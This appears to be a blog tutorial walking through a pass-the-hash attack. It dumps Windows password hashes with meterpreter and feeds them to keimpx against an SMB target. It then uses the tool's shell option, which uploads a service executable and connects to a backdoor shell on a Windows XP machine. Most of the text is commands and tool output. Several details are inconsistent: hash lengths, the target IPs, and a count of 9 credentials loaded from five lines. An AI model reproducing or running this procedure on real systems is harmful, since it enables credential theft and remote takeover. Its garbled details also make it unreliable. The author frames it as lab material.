control – keimpx.py pass the hash


Tool is built into backtrack but for those that like to read more https://github.com/inquisb/keimpx

Once you have exploited a host with metasploit dump the hash's

meterpreter > hashdump
sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

AV will stop this so only good for lab, sorry to say

1. Copy the hash to gedit and save as hash.

sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

2. Create an ip list of devices in gedit and save.

192.168.1.1
192.168.1.2
192.168.1.48
192.168.1.52

3. Open keimpx (Great program)

4. View your saved ip list.

root@bt:/pentest/passwords/keimpx# cat /root/hash/users
192.168.56.20

5. View your saved hash list.

root@bt:/pentest/passwords/keimpx# cat /root/hash/hash
sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

6. keimpx options.

root@bt:/pentest/passwords/keimpx# ./keimpx.py -h
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G.

Usage: ./keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default 10)
-b Batch mode: do not ask to get an interactive SMB shell

7. Run keimpx.

root@bt:/pentest/passwords/keimpx# ./keimpx.py -c /root/hash/hash -l /root/hash/users -v 2

root@bt:/pentest/passwords/keimpx# ./keimpx.py -c /root/hash/hash -l /root/hash/users -v 2
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G.

[17:19:23] [DEBUG] Using 'bt' as local hostname
[17:19:23] [INFO] Loading targets
[17:19:23] [DEBUG] Loading targets from file '/root/hash/users'
[17:19:23] [DEBUG] Parsed target '192.168.1.2:445'
[17:19:23] [INFO] Loading credentials
[17:19:23] [DEBUG] Loading credentials from file '/root/hash/hash'
[17:19:23] [DEBUG] Parsed credentials 'sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90'
[17:19:23] [INFO] Loading domains
[17:19:23] [INFO] Loaded 1 unique targets
[17:19:23] [INFO] Loaded 9 unique credentials
[17:19:23] [INFO] No domains specified, using NULL domain
[17:19:23] [INFO] Attacking host 192.168.1.2:445
[17:19:23] [DEBUG] Connection to host 192.168.1.2:445 established
[17:19:23] [INFO] Valid credentials on 192.168.1.2:445: sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

[17:19:23] [INFO] Attack on host 192.168.1.2:445 finished

The credentials worked in total 1 time

TARGET SORTED RESULTS:

192.168.1.2:445
sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

USER SORTED RESULTS:

sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90
192.168.1.2:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 192.168.1.2:445
> 1
Which credentials do you want to use to connect?
[1] sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

> 1
[17:22:31] [DEBUG] Connection to host 192.168.1.2:445 established
[17:22:31] [DEBUG] Logged in as 11
[17:22:31] [INFO] type 'help' for help menu
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - deploy remotely a service executable
undeploy {service name} {remote file} - undeploy remotely a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list domains to which the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shell
[17:23:40] [INFO] Uploading the service executable to 'ADMIN$\hwrkeh.exe'
[17:23:41] [INFO] Connecting to the SVCCTL named pipe
[17:23:41] [DEBUG] Binding on Services Control Manager (SCM) interface
[17:23:41] [DEBUG] Sending SVCCTL open SCM request
[17:23:41] [DEBUG] Parsing SVCCTL open SCM response
[17:23:41] [INFO] Creating the service 'LACpGG'
[17:23:41] [INFO] Starting the service 'LACpGG'
[17:23:41] [DEBUG] Disconneting from the SVCCTL named pipe
[17:23:41] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows XP [Version 5.1]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s